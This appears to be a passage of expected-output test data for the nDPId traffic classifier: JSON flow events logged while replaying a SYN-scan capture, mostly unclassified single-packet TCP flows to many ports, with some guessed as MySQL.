+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1883,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061256,"flow_last_seen":1278275061256,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1236,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1883,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061256,"flow_last_seen":1278275061256,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1236,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1806,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061111,"flow_last_seen":1278275061111,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":50389,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1806,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061111,"flow_last_seen":1278275061111,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":50389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1882,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061213,"flow_last_seen":1278275061213,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":50389,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1882,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061213,"flow_last_seen":1278275061213,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":50389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":297,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058596,"flow_last_seen":1278275058596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1244,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":297,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058596,"flow_last_seen":1278275058596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1244,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":323,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1244,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":323,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1244,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058031,"flow_last_seen":1278275058031,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1247,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058031,"flow_last_seen":1278275058031,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1247,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":568,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1248,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":568,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1248,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":141,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058155,"flow_last_seen":1278275058155,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1247,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":141,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058155,"flow_last_seen":1278275058155,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1247,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":652,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059518,"flow_last_seen":1278275059518,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1248,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":652,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059518,"flow_last_seen":1278275059518,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1248,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1191,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060292,"flow_last_seen":1278275060292,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3300,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1191,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060292,"flow_last_seen":1278275060292,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3300,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1265,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060393,"flow_last_seen":1278275060393,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3300,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1265,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060393,"flow_last_seen":1278275060393,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3300,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":505,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059221,"flow_last_seen":1278275059221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3301,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":505,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059221,"flow_last_seen":1278275059221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3301,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":526,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059345,"flow_last_seen":1278275059345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3301,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":526,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059345,"flow_last_seen":1278275059345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3301,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1698,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061002,"flow_last_seen":1278275061002,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7402,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1698,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061002,"flow_last_seen":1278275061002,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7402,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00646{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056276,"flow_last_seen":1278275056276,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3306,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"MySQL","breed":"Acceptable","category":"Database"}} 
+00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056276,"flow_last_seen":1278275056276,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3306,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1759,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7402,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1759,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7402,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":510,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059280,"flow_last_seen":1278275059280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1259,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":510,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059280,"flow_last_seen":1278275059280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1259,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00647{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057478,"flow_last_seen":1278275057478,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3306,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"MySQL","breed":"Acceptable","category":"Database"}} 
+00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057478,"flow_last_seen":1278275057478,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3306,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":561,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059406,"flow_last_seen":1278275059406,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1259,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":561,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059406,"flow_last_seen":1278275059406,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1259,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1681,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060969,"flow_last_seen":1278275060969,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5357,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1681,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060969,"flow_last_seen":1278275060969,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5357,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1756,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061071,"flow_last_seen":1278275061071,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5357,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1756,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061071,"flow_last_seen":1278275061071,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5357,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":697,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059566,"flow_last_seen":1278275059566,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1271,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":697,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059566,"flow_last_seen":1278275059566,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1271,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1213,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060336,"flow_last_seen":1278275060336,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1272,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1213,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060336,"flow_last_seen":1278275060336,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1272,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":750,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1271,"l4_proto":"tcp","ndpi": 